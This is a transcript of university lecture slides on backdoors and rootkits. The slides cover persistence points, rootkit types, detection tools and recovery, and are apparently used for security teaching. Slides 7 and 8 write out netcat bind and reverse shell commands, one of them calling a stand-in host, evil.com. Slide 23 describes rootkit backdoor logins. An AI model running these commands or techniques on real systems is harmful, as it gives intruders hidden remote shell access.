CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits.

Slides:



Advertisements
Similar presentations
COEN 250 Computer Forensics Unix System Life Response.
Advertisements

Rootkits CIS 413 This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited and added material. Dr.
Backdoors, Trojans and Rootkits CIS 413 This presentation is an amalgam of presentations by Mark Michael, Randy Marchany and Ed Skoudis. I have edited.
Backdoors A backdoor is a program that allows attackers to bypass normal security controls on a system, gaining access on the attacker’s own terms.
16/03/2009Igor Neri - Sicurezza Informatica1/34 Rootkit: Analysis, Detection and Protection Igor Neri Sicurezza Informatica – Prof. Bistarelli.
Using Nagios for Intrusion detection Miguel Cárdenas Montes Elio Pérez Calle Francisco Javier Rodríguez Calonge.
ROOTKIT VIRUS by Himanshu Mishra Points to be covered Introduction History Uses Classification Installation and Cloaking Detection Removal.
Hacker, Cracker?! Are they the same? No!!! Hacker programmers intensely interested in the arcane and recondite workings of any computer operating system.
Rootkits.
Hacking Linux Based on Hacking Linux Exposed Hatch, Lee, and Kurtz ISBN
Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.
Windows Security and Rootkits Mike Willard January 2007.
電腦攻擊與防禦 The Attack and Defense of Computers Dr. 許 富 皓.
Vijay krishnan Avinesh Dupat  Collection of tools (programs) that enable administrator-level access to a computer or computer network.  The main purpose.
Jai, 2004 Incident Response & Computer Forensics Chapter 6 Live Data Collection from Unix Systems Information Networking Security and Assurance Lab National.
ROOT KITS. Overview History What is a rootkit? Rootkit capabilities Rootkits on windows OS Rootkit demo Detection methodologies Good tools for detection.
Information Networking Security and Assurance Lab National Chung Cheng University Live Data Collection from Unix Systems.
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Linux Networking and Security Chapter 10 File Security.
VMM Based Rootkit Detection on Android Class Presentation Pete Bohman, Adam Kunk, Erik Shaw.
Securing Operating Systems Chapter 10. Security Maintenance Practices and Principles Basic proactive security can prevent many problems Maintenance involves.
Hands-On Microsoft Windows Server 2008
Network and Internet Security SYSTEM SECURITY. Virus Countermeasures Antivirus approach ◦Ideal solution: Prevention ◦Not allowing the virus to infect.
Rootkits Brent Boe Vasanthanag Vasili.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Scanning.
Rootkits. EC-Council The Problem  Microsoft Corp. security researchers are warning about a new generation of powerful system-monitoring programs, or.
Vijay Krishnan Avinesh Dupat. A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators.
1 CSCD 434 Winter 2013 Lecture 10 Attacks and More Attacks Root kits.
CIS 450 – Network Security Chapter 15 – Preserving Access.
CIS 450 – Network Security Chapter 16 – Covering the Tracks.
Securing Operating Systems Rootkits - TAPTI SAHA.
COEN 250 Computer Forensics Windows Life Analysis.
LINUX ROOTKITS Chirk Chu Chief Security Officer University of Alaska Statewide System Information Technology Services.
CSC 382: Computer SecuritySlide #1 Firewalls. CSC 382: Computer SecuritySlide #2 Single Host Firewall Simplest type of firewall—one host acts as a gateway.
© 1999 Ernst & Young LLP e e treme hacking Black Hat 1999 Over the Router, Through the Firewall, to Grandma’s House We Go George Kurtz & Eric Schultze.
Mathieu Castets October 17th,  What is a rootkit?  History  Uses  Types  Detection  Removal  References 2/11.
Linux Networking and Security
Rootkits. Agenda Introduction Definition of a Rootkit Types of rootkits Existing Methodologies to Detect Rootkits Lrk4 Knark Conclusion.
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.
Distributed Denial of Service Attacks Shankar Saxena Veer Vivek Kaushik.
1 Figure 4-1: Targeted System Penetration (Break-In Attacks) Host Scanning  Ping often is blocked by firewalls  Send TCP SYN/ACK to generate RST segments.
CIS 450 – Network Security Chapter 14 – Specific Exploits for UNIX.
VMM Based Rootkit Detection on Android Class Presentation Pete Bohman, Adam Kunk, Erik Shaw.
Rootkits What are they? What do they do? Where do they come from?
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Network Monitoring.
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits.
Rootkits, Backdoors, and Trojans ECE 4112 – Lab 5 Summary – Spring 2006 Group 9 Greg Sheridan Terry Harvey Group 10 Matthew Bowman Laura Silaghi Michael.
COEN 250 Computer Forensics Unix System Life Response.
Digital Forensics Dr. Bhavani Thuraisingham The University of Texas at Dallas Network Forensics - III November 3, 2008.
CIT 380: Securing Computer SystemsSlide #1 CIT 380 Securing Computer Systems Threats.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Rootkits.
VMM Based Rootkit Detection on Android
Lecture 5 Rootkits Hoglund/Butler (Chapters 1-3).
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Covert Channels.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Scanning.
Page 1 Viruses. Page 2 What Is a Virus A virus is basically a computer program that has been written to perform a specific set of tasks. Unfortunately,
Securing a Host Computer BY STEPHEN GOSNER. Definition of a Host  Host  In networking, a host is any device that has an IP address.  Hosts include.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
I have edited and added material.
Rootkit A rootkit is a set of tools which take the ability to access a computer or computer network at administrator level. Generally, hackers install.
Backtracking Intrusions
Chapter 3. Basic Dynamic Analysis
I have edited and added material.
CSC 382/582: Computer Security
Linux Security.
Attacks and More Attacks
Crisis and Aftermath Morris worm.
Preventing Privilege Escalation
Presentation transcript:

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits

CIT 380: Securing Computer SystemsSlide #2 Topics Backdoors –Backdoor Types. –Netcat Backdoors. –Reverse Telnet. –Concealing Backdoors. Rootkits –User-mode Rootkits –Kernel Rootkits –Detecting Rootkits –Recovery from a Rootkit

CIT 380: Securing Computer SystemsSlide #3 Types of Backdoors Local Privilege Escalation Remote Command Execution Remote Shell Access Remote GUI Control

CIT 380: Securing Computer SystemsSlide #4 Starting Backdoors on UNIX /etc/inittab Startup scripts –/etc/rc.d and /etc/init.d scripts –Add a new script. –Modify an existing script. inetd –Add a new service to /etc/inetd.conf User startup scripts –.bashrc,.login,.cshrc,.xinitrc,.xsession, etc. cron

CIT 380: Securing Computer SystemsSlide #5 Starting Backdoors on Windows Autostart Folders –C:\Documents and Settings\[user]\Start Menu\Programs\Startup Startup Scripts –C:\Windows\win.ini, System.ini, Wininit.ini, etc. Registry Keys –HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Many others. Task Scheduler

CIT 380: Securing Computer SystemsSlide #6 Finding Backdoor Scripts Manual Scan –Time-consuming and error prone. Automatic –UNIX: chkrootkit, Titan –Windows: Autorun from File Integrity Check –HIDS like Tripwire or Osiris

CIT 380: Securing Computer SystemsSlide #7 Netcat Backdoors # nc –l –p 2222 –e /bin/sh (server on victim) $ nc victim.org 2222 (client on attacker host) Netcat (client) stdout stdin Netcat (server) stdout stdin Network

CIT 380: Securing Computer SystemsSlide #8 Reverse Backdoors What if the firewall blocks port 2222? What if the firewall blocks all incoming connections to victim.org? Solution: –Run the listener on the attacker host (evil.com). nc –l –p 80 –Run the client with a shell on the victim host. nc evil.com 80 –e /bin/sh

CIT 380: Securing Computer SystemsSlide #9 Defenses against Backdoors Detection –Port scans, e.g., nmap Prevention –Firewall on local host. –Use proxying firewall instead of packet filter.

CIT 380: Securing Computer SystemsSlide #10 Concealing Backdoors Encryption –Pipe through encryption program. –Use cryptcat or socat. Backdoors without ports. –ICMP backdoors. Loki, ICMP tunnel. –Sniffing backdoors.

CIT 380: Securing Computer SystemsSlide #11 Non-promicuous Sniffers Cd00r listens for all traffic to victim host. –Waits for appropriate port knock sequence. –After port knock can Open TCP shell port Reverse telnet a shell to attacker host. Sniff commands off wire.

CIT 380: Securing Computer SystemsSlide #12 Promiscuous Sniffing Backdoors 1.Install sniffing backdoor on victim host. 2.Send backdoor commands to sucker host. 3.Backdoor sniffs packets. 4.Backdoor responds with packets forged to be from sucker host.

CIT 380: Securing Computer SystemsSlide #13 Promiscuous Sniffing Backdoors victim host sucker host attacker host firewall sniff Internet spoof

CIT 380: Securing Computer SystemsSlide #14 What is a rootkit? Collection of attacker tools installed after an intruder has gained access –Log cleaners –File/process/user hiding tools –Network sniffers –Backdoor programs

CIT 380: Securing Computer SystemsSlide #15 Rootkit Goals 1.Remove evidence of original attack and activity that led to rootkit installation. 2.Hide future attacker activity (files, network connections, processes) and prevent it from being logged. 3.Enable future access to system by attacker. 4.Install tools to widen scope of penetration. 5.Secure system so other attackers can’t take control of system from original attacker.

CIT 380: Securing Computer SystemsSlide #16 Concealment Techniques Remove log and audit file entries. Modify system programs to hide attacker files, network connections, and processes. Modify logging system to not log attacker activities. Modify OS kernel system calls to hide attacker activities.

CIT 380: Securing Computer SystemsSlide #17 Installation Concealment Use a subdirectory of a busy system directory like /dev, /etc, /lib, or /usr/lib Use dot files, which aren’t in ls output. Use spaces to make filenames look like expected dot files: “. “ and “.. “ Use filenames that system might use –/dev/hdd (if no 4 th IDE disk exists) –/usr/lib/libX.a (libX11 is real Sun X-Windows) Delete rootkit install directory once installation is complete.

CIT 380: Securing Computer SystemsSlide #18 Attack Tools Network sniffer –Including password grabber utility Password cracker Vulnerability scanners Autorooter –Automatically applies exploits to host ranges DDOS tools

CIT 380: Securing Computer SystemsSlide #19 History of Rootkits 1989: Phrack 25 Black Tie Affair: wtmp wiping. 1994: Advisory CA about SunOS rootkits. 1996: Linux Rootkits (lrk3 released.) 1997: Phrack 51 halflife article: LKM-based rootkits 1998: Silvio Cesare’s kernel patching via kmem. 1999: Greg Hoglund’s NT kernel rootkit paper. 2005: Sony ships CDs with rootkits that hide DRM and spyware that auto-installs when CD played. 2006: SubVirt rootkit moves real OS to a VM.

CIT 380: Securing Computer SystemsSlide #20 Rootkit Types User-mode Rootkits –Binary Rootkits replace user programs. Trojans: ls, netstat, ps Trojan backdoors: login, sshd. –Library Rootkits replace system libraries. Intercept lib calls to hide activities and add backdoors. Kernel Rootkits –Modify system calls/structures that all user-mode programs rely on to list users, processes, and sockets. –Add backdoors to kernel itself.

CIT 380: Securing Computer SystemsSlide #21 Binary Rootkits Install trojan-horse versions of common system commands, such as ls, netstat, and ps to hide attacker activities.. Install programs to edit attacker activity from log and accounting files. Install trojan-horse variants of common programs like login, passwd, and sshd to allow attacker continued access to system. Install network sniffers.

CIT 380: Securing Computer SystemsSlide #22 Linux Root Kit (LRK) v4 Features chsh Trojaned! User->r00t crontab Trojaned! Hidden Crontab Entries du Trojaned! Hide files fix File fixer! ifconfig Trojaned! Hide sniffing inetd Trojaned! Remote access linsniffer Packet sniffer! login Trojaned! Remote access ls Trojaned! Hide files netstat Trojaned! Hide connections passwd Trojaned! User->r00t ps Trojaned! Hide processes rshd Trojaned! Remote access sniffchk Program to check if sniffer is up and running syslogd Trojaned! Hide logs tcpd Trojaned! Hide connections, avoid denies top Trojaned! Hide processes wted wtmp/utmp editor! z2 Zap2 utmp/wtmp/lastlog eraser!

CIT 380: Securing Computer SystemsSlide #23 Linux Root Kit (LRK) v4 Trojans ifconfig – Doesn’t display PROMISC flag when sniffing. login – Allows login to any account with the rootkit password. If root login is refused on your terminal login as "rewt". Disables history logging when backdoor is used. ls – Hides files listed in /dev/ptyr. All files shown with 'ls -/' if SHOWFLAG enabled. passwd – Enter your rootkit password instead of old password to become root. ps – Hides processes listed in /dev/ptyp. rshd – Execute remote commands as root: rsh -l rootkitpassword host command syslogd – Removes log entries matching strings listed in /dev/ptys.

CIT 380: Securing Computer SystemsSlide #24 Binary Rootkit Detection Use non-trojaned programs –ptree is generally uncompromised –tar will archive hidden files, the list with -t –lsof is also generally safe –Use known good tools from CD-ROM. File integrity checks –tripwire, AIDE, Osiris –rpm –V –a –Must have known valid version of database offline or attacker may modify file signatures to match Trojans.

CIT 380: Securing Computer SystemsSlide #25 Library Rootkits t0rn rootkit uses special system library libproc.a to intercept process information requested by user utilities. Modify libc –Intercept system call data returning from kernel, stripping out evidence of attacker activities. –Alternately, ensure that rootkit library providing system calls is called instead of libc by placing it in /etc/ld.so.preload

CIT 380: Securing Computer SystemsSlide #26 Kernel Rootkits Kernel runs in supervisor processor mode –Complete control over machine. Rootkits modify kernel system calls –execve modified to run Trojan horse binary for some programs, while other system calls used by integrity checkers read original binary file. –setuid modified to give root to a certain user. Advantage—Stealth –Runtime integrity checkers cannot see rootkit changes. –All programs impacted by kernel Trojan horse. –Open backdoors/sniff network without running processes.

CIT 380: Securing Computer SystemsSlide #27 Types of Kernel Rootkits Loadable Kernel Modules –Device drivers are LKMs. –Can be defeated by disabling LKMs. –ex: Adore, Knark Alter running kernel in memory. –Modify /dev/kmem directly. –ex: SucKit Alter kernel on disk.

CIT 380: Securing Computer SystemsSlide #28 Kernel Rootkit Detection List kernel modules –lsmod –cat /proc/modules Examine kernel symbols (/proc/ksyms ) –Module name listed in [] after symbol name. Check system call addresses –Compare running kernel syscall addresses with those listed in System.map generated at kernel compile. All of these signatures can be hidden/forged.

CIT 380: Securing Computer SystemsSlide #29 Knark Linux-based LKM rootkit Features –Hide/unhide files or directories –Hide TCP or UDP connections –Execution redirection –Unauthenticated privilege escalation –Utility to change UID/GID of a running process. –Unauthenticated, privileged remote execution daemon. –Kill –31 to hide a running process. modhide: assistant LKM that hides Knark from module listing attempts.

CIT 380: Securing Computer SystemsSlide #30 Rootkit Detection Offline system examination –Mount and examine disk using another OS kernel+image. –Knoppix: live CD linux distribution. Computer Forensics –Examine disk below filesystem level. –Helix: live CD linux forensics tool.

CIT 380: Securing Computer SystemsSlide #31 Rootkit Detection Utilities chkrootkit –Detects >50 rootkits on multiple UNIX types. –Checks commonly trojaned binaries. –Examines log files for modifications. –Checks for LKM rootkits. –Use –p option to use known safe binaries from CDROM. carbonite –LKM that searches for rootkits in kernel. –Generates and searches frozen image kernel process structures.

CIT 380: Securing Computer SystemsSlide #32 Detection Countermeasures Hide rootkit in unused sectors or in unused fragments of used sectors. Install rootkit into flash memory like PC BIOS, ensuring that rootkit persists even after disk formatting and OS re-installation.

CIT 380: Securing Computer SystemsSlide #33 Rootkit Recovery Restore compromised programs from backup –Lose evidence of intrusion. –Did you find all the trojans? Backup system, then restore from tape –Save image of hard disk for investigation. –Restore known safe image to be sure that all trojans have been eliminated. –Patch system to repair exploited vulnerability.

CIT 380: Securing Computer SystemsSlide #34 Key Points Backdoors allow intruder into system without using exploit again. Rootkits automatically deeply compromise a system once root access is attained. Rootkits are easy to use, difficult to detect. Don’t trust anything on a compromised system— access disk from a known safe system, like a Knoppix CD. Recovery requires a full re-installation of the OS and restoration of files from a known good backup.

CIT 380: Securing Computer SystemsSlide #35 References 1.Oktay Altunergil, “Scanning for Rootkits,” Silvio Cesare, “Runtime kernel kmem patching,” William Cheswick, Steven Bellovin, and Avriel Rubin, Firewalls and Internet Security, 2 nd edition, Anton Chuvakin, “An Overview of UNIX Rootkits,” iDEFENSE whitepaper, Dave Dittrich, “Rootkits FAQ,” Greg Hoglund and Gary McGraw, Exploiting Software: How to Break Code, Addison-Wesley, Samuel T. King et. al., “SubVirt: Implementing malware with virtual machines”, McClure, Stuart, Scambray, Joel, Kurtz, George, Hacking Exposed, 3 rd edition, McGraw-Hill, Peikari, Cyrus and Chuvakin, Anton, Security Warrior, O’Reilly & Associates, pragmatic, (nearly) Complete Loadable Linux Kernel Modules, Marc Russinovich, “Sony, Rootkits and Digital Rights Management Gone Too Far,” management-gone-too-far.aspx management-gone-too-far.aspx 12.Jennifer Rutkowska, “Red Pill: or how to detect VMM using (almost) one CPU instruction,” Ed Skoudis, Counter Hack Reloaded, Prentice Hall, Ed Skoudis and Lenny Zeltser, Malware: Fighting Malicious Code, Prentice Hall, Ranier Wichman, “Linux Kernel Rootkits,”

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.